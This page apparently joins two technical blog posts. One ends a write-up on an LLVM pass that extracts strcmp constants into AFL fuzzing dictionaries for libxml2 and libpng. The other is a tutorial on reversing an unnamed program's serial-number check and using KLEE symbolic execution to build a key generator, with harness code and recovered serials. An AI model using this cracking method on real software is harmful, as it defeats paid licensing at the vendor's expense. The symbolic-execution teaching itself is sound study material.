[+] Call to strcmp with constant "ISO-10646-UCS-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-10646-UCS-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UCS4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-LATIN-1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO LATIN 1" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-LATIN-2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO LATIN 2" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-3" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-4" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-5" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-6" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-7" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-8859-9" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "ISO-2022-JP" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "SHIFT_JIS" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "EUC-JP" found in encoding.c/xmlParseCharEncoding__internal_alias
[...]
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 1214 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "exit" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "quit" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "help" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "validate" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "load" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "relaxng" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "save" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "write" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "grep" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "free" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "base" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setns" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setrootns" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "xpath" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "setbase" found in debugXML.c/xmlShell__internal_alias
[+] Call to strcmp with constant "whereis" found in debugXML.c/xmlShell__internal_alias
[...]

over@bubuntu:~/workz/libxml2$ sort -u /tmp/xml.dict
"307377"
"base"
"c14n"
"catalog"
"<![CDATA["
"chvalid"
"crazy:"
"debugXML"
"dict"
"disable SAX"
"document"
"encoding"
"entities"
"EUC-JP"
"exit"
"fetch external entities"
"file:///etc/xml/catalog"
"free"
"ftp://"
"gather line info"
"grep"
"hash"
"help"
"HTMLparser"
"HTMLtree"
"http"
"HTTP/"
"huge:"
"huge:attrNode"
"huge:commentNode"
"huge:piNode"
"huge:textNode"
"is html"
"ISO-10646-UCS-2"
"ISO-10646-UCS-4"
"ISO-2022-JP"
"ISO-8859-1"
"ISO-8859-2"
"ISO-8859-3"
"ISO-8859-4"
"ISO-8859-5"
"ISO-8859-6"
"ISO-8859-7"
"ISO-8859-8"
"ISO-8859-9"
"ISO LATIN 1"
"ISO-LATIN-1"
"ISO LATIN 2"
"ISO-LATIN-2"
"is standalone"
"is valid"
"is well formed"
"keep blanks"
"list"
"load"
"nanoftp"
"nanohttp"
"parser"
"parserInternals"
"pattern"
"quit"
"relaxng"
"save"
"SAX2"
"SAX block"
"SAX function attributeDecl"
"SAX function cdataBlock"
"SAX function characters"
"SAX function comment"
"SAX function elementDecl"
"SAX function endDocument"
"SAX function endElement"
"SAX function entityDecl"
"SAX function error"
"SAX function externalSubset"
"SAX function fatalError"
"SAX function getEntity"
"SAX function getParameterEntity"
"SAX function hasExternalSubset"
"SAX function hasInternalSubset"
"SAX function ignorableWhitespace"
"SAX function internalSubset"
"SAX function isStandalone"
"SAX function notationDecl"
"SAX function reference"
"SAX function resolveEntity"
"SAX function setDocumentLocator"
"SAX function startDocument"
"SAX function startElement"
"SAX function unparsedEntityDecl"
"SAX function warning"
"schemasInternals"
"schematron"
"setbase"
"setns"
"setrootns"
"SHIFT_JIS"
"sql:"
"substitute entities"
"test/threads/invalid.xml"
"total"
"tree"
"tutor10_1"
"tutor10_2"
"tutor3_2"
"tutor8_2"
"UCS-2"
"UCS2"
"UCS-4"
"UCS4"
"user data"
"UTF-16"
"UTF16"
"UTF-16BE"
"UTF-16LE"
"UTF-8"
"UTF8"
"valid"
"validate"
"whereis"
"write"
"xinclude"
"xmlautomata"
"xmlerror"
"xmlIO"
"xmlmodule"
"xmlreader"
"xmlregexp"
"xmlsave"
"xmlschemas"
"xmlschemastypes"
"xmlstring"
"xmlunicode"
"xmlwriter"
"xpath"
"xpathInternals"
"xpointer"

Performance wise - here is what we are looking at on libpng (+0.283s):

over@bubuntu:~/workz/lpng1625$ make clean && time AFL_TOKEN_FILE=/tmp/png.dict make && make clean && time make
[...]
real    0m12.320s
user    0m11.732s
sys     0m0.360s
[...]
real    0m12.037s
user    0m11.436s
sys     0m0.384s

Last words

I am very interested in hearing from you if you give a shot to this analysis pass on your code-base and / or your fuzzing sessions, so feel free to hit me up! Also, note that libfuzzer supports the same feature and is compatible with afl's dictionary syntax - so you get it for free!

Here is a list of interesting articles talking about transformation/analysis passes that I recommend you read if you want to know more:

Special shout-outs to my proofreaders: yrp, mongo & jonathan.

Go hax clang and or LLVM!

Keygenning with KLEE

Introduction

In the past weeks I enjoyed working on reversing a piece of software (don't ask me the name), to study how serial numbers are validated. The story the user has to follow is pretty common: download the trial, pay, get the serial number, use it in the annoying nag screen to get the fully functional version of the software.

Since my purpose is to not damage the company developing the software, I will not mention the name of the software, nor I will publish the final key generator in binary form, nor its source code. My goal is instead to study a real case of serial number validation, and to highlight its weaknesses.

In this post we are going to take a look at the steps I followed to reverse the serial validation process and to make a key generator using KLEE symbolic virtual machine. We are not going to follow all the details on the reversing part, since you cannot reproduce them on your own. We will concentrate our thoughts on the key-generator itself: that is the most interesting part.

Getting acquainted

The software is an x86 executable, with no anti-debugging, nor anti-reversing techniques. When started it presents a nag screen asking for a registration composed by: customer number, serial number and a mail address. This is fairly common in software.

Tools of the trade

First steps in the reversing are devoted to find all the interesting functions to analyze. To do this I used IDA Pro with Hex-Rays decompiler, and the WinDbg debugger. For the last part I used KLEE symbolic virtual machine under Linux, gcc compiler and some bash scripting. The actual key generator was a simple WPF application.

Let me skip the first part, since it is not very interesting. You can find many other articles on the web that can guide you through basic reversing techniques with IDA Pro. I only kept in mind some simple rules, while going forward:

  • always rename functions that uses interesting data, even if you don't know precisely what they do. A name like license_validation_unknown_8 is always better than a default like sub_46fa39;
  • similarly, rename data whenever you find it interesting;
  • change data types when you are sure they are wrong: use structs and arrays in case of aggregates;
  • follow cross references of data and functions to expand your collection;
  • validate your beliefs with the debugger if possible. For example, if you think a variable contains the serial, break with the debugger and see if it is the case.

Big picture

When I collected the most interesting functions, I tried to understand the high level flow and the simpler functions. Here are the main variables and types used in the validation process. As a note for the reader: most of them have been purged of uninteresting details, for the sake of simplicity.

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

Here we have a global variable providing the type of the license, used to enable and disable features of the application.

enum result_t {
    INVALID,
    VALID,
    VALID_IF_LAST_VERSION
};

This is a convenient enum used as a result for the validation. INVALID and VALID values are pretty self-explanatory. VALID_IF_LAST_VERSION tells that this registration is valid only if the current software version is the last available. The reasons for this strange possibility will be clear shortly.

#define HEADER_SIZE 8192
struct {
    int header[HEADER_SIZE];
    int data[1000000];
} mail_digest_table;

This is a data structure, containing digests of mail addresses of known registered users. This is a pretty big file embedded in the executable itself. During startup, a resource is extracted in a temporary file and its content copied into this struct. Each element of the header vector is an offset pointing inside the data vector.

Here we have a pseudo-C code for the registration check, that uses data types and variables explained above:

enum result_t check_registration(int serial, int customer_num, const char* mail) {
    // validate serial number
    license_type = get_license_type(serial);
    if (license_type == ERROR)
        return INVALID;

    // validate customer number
    int expected_customer = compute_customer_number(serial, mail);
    if (expected_customer != customer_num)
        return INVALID;

    // validate w.r.t. known registrations
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

The validation is divided in three main parts:

  • serial number must be valid by itself;
  • serial number, combined with mail address has to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

The last point is a little bit unusual. Let me restate it in this way: whenever a customer buys the software, the customer table gets updated with its data and become available in the next version of the software (because it is embedded in the binary and not downloaded trough the internet). This explains the VALID_IF_LAST_VERSION check: if you buy the software today, the current version does not contain your data. You are still allowed to get a "pro" version until a new version is released. In that moment you are forced to update to that new version, so the software can verify your registration with the updated table. Here is a pseudo-code of that check:

switch (check_registration(serial, customer, mail)) {
case VALID:
    // the registration is OK! activate functionalities
    activate_pro_functionality();
    break;
case VALID_IF_LAST_VERSION:
    {
        // check if the current version is the last, by
        // using the internet.
        int current_version = get_current_version();
        int last_version = get_last_version();
        if (current_version == last_version)
            // OK for now: a new version is not available
            activate_pro_functionality();
        else
            // else, force the user to download the new version
            // before proceed
            ask_download();
    }
    break;
case INVALID:
    // registration is not valid
    handle_invalid_registration();
    break;
}

The version check is done by making an HTTP request to a specific page that returns a page having only the last version number of the software. Don't ask me why the protection is not completely server side but involves static tables, version checks and things like that. I don't know!

Anyway, this is the big picture of the registration validation functions, and this is pretty boring. Let's move on to the interesting part. You may notice that I provided code for the main procedure, but not for the helper functions like get_license_type, compute_customer_number, and so on. This is because I did not have to reverse them. They contain a lot of arithmetical and logical operations on registration data, and they are very difficult to understand. The good news is that we do not have to understand them, we need only to reverse them!

Symbolic execution

Symbolic execution is a way to execute programs using symbolic variables instead of concrete values. A symbolic variable is used whenever a value can be controlled by user input (this can be done by hand or determined by using taint analysis), and could be a file, standard input, a network stream, etc. Symbolic execution translates the program's semantics into a logical formula. Each instruction cause that formula to be updated. By solving a formula for one path, we get concrete values for the variables. If those values are used in the program, the execution reaches that program point. Dynamic Symbolic Execution (DSE) builds the logical formula at runtime, step-by-step, following one path at a time. When a branch of the program is found during the execution, the engine transforms the condition into arithmetic operations. It then chooses the T (true) or F (false) branch and updates the formula with this new constraint (or its negation). At the end of a path, the engine can backtrack and select another path to execute. For example:

int v1 = SymVar_1, v2 = SymVar_2; // symbolic variables
if (v1 > 0)
    v2 = 0;
if (v2 == 0 && v1 <= 0)
    error();

We want to check if error is reachable, by using symbolic variables SymVar_1 and SymVar_2, assigned to the program's variables v1 and v2. In line 2 we have the condition v1 > 0 and so, the symbolic engine adds a constraint SymVar_1 > 0 for the true branch or conversely SymVar_1 <= 0 for the false branch. It then continues the execution trying with the first constraint. Whenever a new path condition is reached, new constraints are added to the symbolic state, until that condition is no more satisfiable. In that case, the engine backtracks and replaces some constraints with their negation, in order to reach other code paths. The execution engine tries to cover all code paths, by solving those constraints and their negations. For each portion of the code reached, the symbolic engine outputs a test case covering that part of the program, providing concrete values for the input variables. In the particular example given, the engine continues the execution, and finds the condition v2 == 0 && v1 <= 0 at line 4. The path formula becomes so: SymVar_1 > 0 && (SymVar_2 == 0 && SymVar_1 <= 0), that is not satisfiable. The symbolic engine provides then values for the variables that satisfies the previous formula (SymVar_1 > 0). For example SymVar_1 = 1 and some random value for SymVar_2. The engine then backtrack to the previous branch and uses the negation of the constraint, that is SymVar_1 <= 0. It then adds the negation of the current constraint to cover the false branch, obtaining SymVar_1 <= 0 && (SymVar_2 != 0 || SymVar_1 > 0). This is satisfiable with SymVar_1 = -1 and SymVar_2 = 0. This concludes the analysis of the program paths, and our symbolic execution engine can output the following test cases:

  • v1 = 1;
  • v1 = -1, v2 = 0.

Those test cases are enough to cover all the paths of the program.

This approach is useful for testing because it helps generating test cases. It is often effective, and it does not waste computational power of your brain. You know... tests are very difficult to do effectively, and brain power is such a scarce resource!

I don't want to elaborate too much on this topic because it is way too big to fit in this post. Moreover, we are not going to use symbolic execution engines for testing purpose. This is just because we don't like to use things in the way they are intended :)

However, I will point you to some good references in the last section. Here I can list a series of common strengths and weaknesses of symbolic execution, just to give you a little bit of background:

Strengths:

  • when a test case fails, the program is proven to be incorrect;
  • automatic test cases catch errors that often are overlooked in manual written test cases (this is from KLEE paper);
  • when it works it's cool :) (and this is from Jérémy);

Weaknesses:

  • when no tests fail we are not sure everything is correct, because no proof of correctness is given; static analysis can do that when it works (and often it does not!);
  • covering all the paths is not enough, because a variable can hold different values in one path and only some of them cause a bug;
  • complete coverage for non trivial programs is often impossible, due to path explosion or constraint solver timeout;
  • scaling is difficult, and execution time of the engine can suffer;
  • undefined behavior of CPU could lead to unexpected results;
  • ... and maybe there are a lot more remarks to add.

KLEE

KLEE is a great example of a symbolic execution engine. It operates on LLVM byte code, and it is used for software verification purposes. KLEE is capable to automatically generate test cases achieving high code coverage. KLEE is also able to find memory errors such as out of bound array accesses and many other common errors. To do that, it needs an LLVM byte code version of the program, symbolic variables and (optionally) assertions. I have also prepared a Docker image with clang and klee already configured and ready to use. So, you have no excuses to not try it out! Take this example function:

#define FALSE 0
#define TRUE 1
typedef int BOOL;

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    return FALSE; // not reachable
}

This is actually a silly example, I know, but let's pretend to verify this function with this main:

#include <assert.h>
#include <klee/klee.h>

int main() {
    int input;
    klee_make_symbolic(&input, sizeof(int), "input");
    return check_arg(input);
}

In main we have a symbolic variable used as input for the function to be tested. We can also modify it to include an assertion:

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a <= 10)
        return TRUE;
    klee_assert(FALSE);
    return FALSE; // not reachable
}

We can now use clang to compile the program to the LLVM byte code and run the test generation with the klee command:

clang -emit-llvm -g -o test.ll -c test.c
klee test.ll

We get this output:

KLEE: output directory is "/work/klee-out-0"

KLEE: done: total instructions = 26
KLEE: done: completed paths = 2
KLEE: done: generated tests = 2

KLEE will generate test cases for the input variable, trying to cover all the possible execution paths and to make the provided assertions to fail (if any given). In this case we have two execution paths and two generated test cases, covering them. Test cases are in the output directory (in this case /work/klee-out-0). The soft link klee-last is also provided for convenience, pointing to the last output directory. Inside that directory a bunch of files were created, including the two test cases named test000001.ktest and test000002.ktest. These are binary files, which can be examined with the ktest-tool utility. Let's try it:

$ ktest-tool --write-ints klee-last/test000001.ktest 
ktest file : 'klee-last/test000001.ktest'
args       : ['test.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: 2147483647

And the second one:

$ ktest-tool --write-ints klee-last/test000002.ktest 
...
object    0: data: 0

In these test files, KLEE reports the command line arguments, the symbolic objects along with their size and the value provided for the test. To cover the whole program, we need input variable to get a value greater than 10 and one below or equal. You can see that this is the case: in the first test case the value 2147483647 is used, covering the first branch, while 0 is provided for the second, covering the other branch.

So far, so good. But what if we change the function in this way?

BOOL check_arg(int a) {
    if (a > 10)
        return FALSE;
    else if (a < 10)    // instead of <=
        return TRUE;
    klee_assert(FALSE);
    return FALSE;       // now reachable
}

We get this output:

$ klee test.ll 
KLEE: output directory is "/work/klee-out-2"
KLEE: ERROR: /work/test.c:9: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 27
KLEE: done: completed paths = 3
KLEE: done: generated tests = 3

And this is the klee-last directory contents:

$ ls klee-last/
assembly.ll   run.istats        test000002.assert.err  test000003.ktest
info          run.stats         test000002.ktest       warnings.txt
messages.txt  test000001.ktest  test000002.pc

Note the test000002.assert.err file. If we examine its corresponding test file, we have:

$ ktest-tool --write-ints klee-last/test000002.ktest 
ktest file : 'klee-last/test000002.ktest'
...
object    0: data: 10

As we had expected, the assertion fails when input value is 10. So, as we now have three execution paths, we also have three test cases, and the whole program gets covered. KLEE provides also the possibility to replay the tests with the real program, but we are not interested in it now. You can see a usage example in this KLEE tutorial.

KLEE's abilities to find execution paths of an application are very good. According to the OSDI 2008 paper, KLEE has been successfully used to test all 89 stand-alone programs in GNU COREUTILS and the equivalent busybox port, finding previously undiscovered bugs, errors and inconsistencies. The achieved code coverage were more than 90% per tool. Pretty awesome!

But, you may ask: The question is, who cares?. You will see it in a moment.

KLEE to reverse a function

As we have a powerful tool to find execution paths, we can use it to find the path we are interested in. As showed by the nice symbolic maze post of Feliam, we can use KLEE to solve a maze. The idea is simple but very powerful: flag the portion of code you interested in with a klee_assert(0) call, causing KLEE to highlight the test case able to reach that point. In the maze example, this is as simple as changing a read call with a klee_make_symbolic and the prinft("You win!\n") with the already mentioned klee_assert(0). Test cases triggering this assertion are the one solving the maze!

For a concrete example, let's suppose we have this function:

int magic_computation(int input) {
    for (int i = 0; i < 32; ++i)
        input ^= 1 << i;
    return input;
}

And we want to know for what input we get the output 253. A main that tests this could be:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    int output = magic_computation(input);
    if (output == 253)
        printf("You win!\n");
    else
        printf("You lose\n");
    return 0;
}

KLEE can resolve this problem for us, if we provide symbolic inputs and actually an assert to trigger:

int main(int argc, char* argv[]) {
    int input, result;
    klee_make_symbolic(&input, sizeof(int), "input");
    result = magic_computation(input);
    if (result == 253)
        klee_assert(0);
    return 0;
}

Run KLEE and print the result:

$ clang -emit-llvm -g -o magic.ll -c magic.c
$ klee magic.ll
$ ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['magic.ll']
num objects: 1
object    0: name: 'input'
object    0: size: 4
object    0: data: -254

The answer is -254. Let's test it:

$ gcc magic.c
$ ./a.out -254
You win!

Yes!

KLEE, libc and command line arguments

Not all the functions are so simple. At least we could have calls to the C standard library such as strlen, atoi, and such. We cannot link our test code with the system available C library, as it is not inspectable by KLEE. For example:

int main(int argc, char* argv[]) {
    int input = atoi(argv[1]);
    return input;
}

If we run it with KLEE we get this error:

$ clang -emit-llvm -g -o atoi.ll -c atoi.c
$ klee atoi.ll 
KLEE: output directory is "/work/klee-out-4"
KLEE: WARNING: undefined reference to function: atoi
KLEE: WARNING ONCE: calling external: atoi(0)
KLEE: ERROR: /work/atoi.c:5: failed external call: atoi
KLEE: NOTE: now ignoring this error at this location
...

To fix this we can use the KLEE uClibc and POSIX runtime. Taken from the help:

"If we were running a normal native application, it would have been linked with the C library, but in this case KLEE is running the LLVM bitcode file directly. In order for KLEE to work effectively, it needs to have definitions for all the external functions the program may call. Similarly, a native application would be running on top of an operating system that provides lower level facilities like write(), which the C library uses in its implementation. As before, KLEE needs definitions for these functions in order to fully understand the program. We provide a POSIX runtime which is designed to work with KLEE and the uClibc library to provide the majority of operating system facilities used by command line applications".

Let's try to use these facilities to test our atoi function:

$ klee --optimize --libc=uclibc --posix-runtime atoi.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-5"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 70495424)
KLEE: ERROR: /tmp/klee-uclibc/libc/stdlib/stdlib.c:526: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5756
KLEE: done: completed paths = 68
KLEE: done: generated tests = 68

And KLEE founds the possible out of bound access in our program. Because you know, our program is bugged :) Before to jump and fix our code, let me briefly explain what these new flags did:

  • --optimize: this is for dead code elimination. It is actually a good idea to use this flag when working with non-trivial applications, since it speeds things up;
  • --libc=uclibc and --posix-runtime: these are the aforementioned options for uClibc and POSIX runtime;
  • --sym-args 0 1 3: this flag tells KLEE to run the program with minimum 0 and maximum 1 argument of length 3, and make the arguments symbolic.

Note that adding atoi function to our code, adds 68 execution paths to the program. Using many libc functions in our code adds complexity, so we have to use them carefully when we want to reverse complex functions.

Let now make the program safe by adding a check to the command line argument length. Let's also add an assertion, because it is fun :)

#include <stdlib.h>
#include <assert.h>
#include <klee/klee.h>

int main(int argc, char* argv[]) {
    int result = argc > 1 ? atoi(argv[1]) : 0;
    if (result == 42)
        klee_assert(0);
    return result;
}

We could also have written klee_assert(result != 42), and get the same result. No matter what solution we adopt, now we have to run KLEE as before:

$ clang -emit-llvm -g -o atoi2.ll -c atoi2.c
$ klee --optimize --libc=uclibc --posix-runtime atoi2.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-6"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 53243904)
KLEE: ERROR: /work/atoi2.c:8: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5962
KLEE: done: completed paths = 73
KLEE: done: generated tests = 69

Here we go! We have fixed our bug. KLEE is also able to find an input to make the assertion fail:

$ ls klee-last/ | grep err
test000016.assert.err
$ ktest-tool klee-last/test000016.ktest
ktest file : 'klee-last/test000016.ktest'
args       : ['atoi.ll', '--sym-args', '0', '1', '3']
num objects: 3
...
object    1: name: 'arg0'
object    1: size: 4
object    1: data: '+42\x00'
...

And the answer is the string "+42"... as we know.

There are many other KLEE options and functionalities, but let's move on and try to solve our original problem. Interested readers can find a good tutorial, for example, in How to Use KLEE to Test GNU Coreutils.

KLEE keygen

Now that we know basic KLEE commands, we can try to apply them to our particular case. We have understood some of the validation algorithm, but we don't know the computation details. They are just a mess of arithmetical and logical operations that we are tired to analyze.

Here is our plan:

  • we need at least a valid customer number, a serial number and a mail address;
  • more ambitiously we want a list of them, to make a key generator.

This is a possibility:

// copy and paste of all the registration code
enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;
// ...
enum result_t check_registration(int serial, int customer_num, const char* mail);
// ...

int main(int argc, char* argv[]) {
    int serial, customer;
    char mail[10];
    enum result_t result;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    klee_make_symbolic(&customer, sizeof(customer), "customer");
    klee_make_symbolic(&mail, sizeof(mail), "mail");

    valid = check_registration(serial, customer, mail);
    valid &= license_type == PRO;
    klee_assert(!valid);
}

Super simple. Copy and paste everything, make the inputs symbolic and assert a certain result (negated, of course).

No! That's not so simple. This is actually the most difficult part of the game. First of all, what do we want to copy? We don't have the source code. In my case I used Hex-Rays decompiler, so maybe I have cheated. When you decompile, however, you don't get immediately a compilable C source code, since there could be dependencies between functions, global variables, and specific Hex-Rays types. For this latter problem I've prepared a ida_defs.h header, providing defines coming from IDA and from Windows headers.

But what to copy? The high level picture of the validation algorithm I have presented is an ideal one. The check_registration function is actually a big set of auxiliary functions and data, very tightened with other parts of the program. Even if we now know the most interesting functions, we need to know how much of the related code, is useful or not. We cannot throw everything in our key generator, since every function brings itself other related data and functions. In this way we will end up having the whole program in it. We need to minimize the code KLEE has to analyze, otherwise it will be too difficult to have its job done.

This is a picture of the high level workflow, as IDA proximity view proposes:

Known license functions

and this is the overview for a single node of this schema (precisely license_getType):

license_getType overview

As you can imagine, the complete call graph becomes really big in the end.

In the cleanup process I have done, a big bunch of functions removed is the one extracting and loading the table of valid mail addresses. To do this I stepped with the debugger until the table was completely loaded and then dumped the memory of the process. Then I've used a nice "export to C array" functionality of HEX Workshop, to export the actual piece of memory of the mail table to actual code:

uint16_t hashHeader[8192] =
{
    0x0, 0x28, 0x12, 0x24, 0x2d, 0x2b, 0x2e, 0x23, 0x2b, 0x26,
    // ...
};
int16_t hashData[1000000] =
{
    15306, 18899, 18957, -24162, 63045, -26834, -21, -39653, 271441, -5588,
    // ...
};

But, cutting out code is not the only problem I've found in this step. External constraints must be carefully considered. For example the time function can be handled by KLEE itself. KLEE tries to generate useful values even from that function. This is good if we want to test bugs related to a strange current time, but in our case, since the code will be executed by the program at a particular time, we are only interested in the value provided at that time. We don't want KLEE traits this function as symbolic; we only want the right time value. To solve that problem, I have replaced all the calls to time to a my_time function, returning a fixed value, defined in the source code.

Another problem comes from the extraction of the functions from their outer context. Often code is written with implicit conventions in mind. These are not self-evident in the code because checks are avoided. A trivial example is the null terminator and valid ASCII characters in strings. KLEE does not assume those constraints, but the validation code does. This is because the GUI provides only valid strings. A less trivial example is that the mail address is always passed lowercase from the GUI to the lower level application logic. This is not self-evident if you do not follow every step from the user input to the actual computations with the data.

The solution to this latter problem is to provide those constraints to KLEE:

char mail[10];
char c;
klee_make_symbolic(mail, sizeof(mail), "mail");
for (i = 0; i < sizeof(mail) - 1; ++i) {
    c = mail[i];
    klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
}
klee_assume(mail[sizeof(mail) - 1] == '\0');

Logical operators inside klee_assume function are bitwise and not logical (i.e. & and | instead of && and ||) because they are simpler, since they do not add the extra branches required by lazy operators.

Throw everything into KLEE

Having extracted all the needed functions and global data and solved all the issues with the code, we can now move on and run KLEE with our brand new test program:

$ clang -emit-llvm -g -o attempt1.ll -c attempt1.c
$ klee --optimize --libc=uclibc --posix-runtime attempt1.ll

And then wait for an answer.

And wait for another while.

Make some coffee, drink it, come back and watch the PC heating up.

Go out, walk around, come back, have a shower, and.... oh no! It's still running! OK, that's enough! Let's kill it.

Deconstruction approach

We have assumed too much from the tool. It's time to use the brain and ease its work a little bit.

Let's decompose the big picture of the registration check presented before piece by piece. We will try to solve it bit by bit, to reduce the solution space and so, the complexity.

Recall that the algorithm is composed by three main conditions:

  • serial number must be valid by itself;
  • serial number, combined with mail address have to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

Can we split them in different KLEE runs?

Clearly the first one can be written as:

#include <assert.h>
#include <klee/klee.h>
// include all the functions extracted from the program
#include "extracted_code.c"

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

int main(int argc, char* argv[]) {
    int serial, valid;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    klee_assert(!valid);
}

And let's see if KLEE can work with this single function:

$ clang -emit-llvm -g -o serial_type.ll -c serial_type.c
$ klee --optimize --libc=uclibc --posix-runtime serial_type.ll
...
KLEE: ERROR: /work/symbolic/serial_type.c:17: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000019.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
ktest file : 'klee-last/test000019.ktest'
args       : ['serial_type.ll']
num objects: 2
object    0: name: 'model_version'
object    0: size: 4
object    0: data: 1
object    1: name: 'serial'
object    1: size: 4
object    1: data: 102690141

Yes! we now have a serial number that is considered PRO by our target application.

The third condition is less simple: we have a table in which are stored values matching mail addresses with serial numbers. The high level check is this:

int check(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

This piece of code imposes constraints on our mail address and serial number, but not on the customer number. We can rewrite the checks in two parts, the one checking the serial, and the one checking the mail address:

int check_serial(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    int valid = index <= HEADER_SIZE;
}

int check_mail(char* mail, int index) {
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return 1;
    }
    return 0;
}

The check_mail function needs the index in the table as secondary input, so it is not completely independent from the other check function. However, check_mail can be incorporated by our successful test program used before:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    // added just now
    index = get_index_in_mail_table(serial);
    valid &= index <= HEADER_SIZE;

    klee_assert(!valid);
}

And if we run it, we get our revised serial number, that satisfies the additional constraint:

$ clang -emit-llvm -g -o serial.ll -c serial.c
$ klee --optimize --libc=uclibc --posix-runtime serial.ll
...
KLEE: ERROR: /work/symbolic/serial.c:21: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000032.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
...
object    1: name: 'serial'
object    1: data: 120300641
...

